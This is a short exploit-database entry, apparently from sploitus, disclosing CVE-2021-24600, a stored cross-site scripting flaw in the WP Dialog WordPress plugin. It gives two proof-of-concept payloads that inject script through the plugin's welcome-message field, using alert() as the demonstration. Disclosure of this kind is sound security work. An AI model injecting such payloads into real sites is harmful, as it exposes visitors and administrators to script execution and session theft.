Exploit for WP Dialog <= 1.2.5.5 - Authenticated Stored Cross-Site Scripting CVE-2021-24600

Name: Exploit for WP Dialog <= 1.2.5.5 - Authenticated Stored Cross-Site Scripting CVE-2021-24600
Rating: 5 (270 reviews)

2021-07-31 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:413B3A2E-1C05-45EC-B00F-1C137A1AE33E
Put the following payload in the Welcome message (st_content parameter) of the plugin:

</script><img src onerror=alert(/XSS/)> to trigger the XSS in any frontend page
</textarea><img src onerror=alert(/XSS/)> to trigger the XSS in the plugin's settings

https://github.com/liaojia-99/my-creat-cve/blob/main/1.md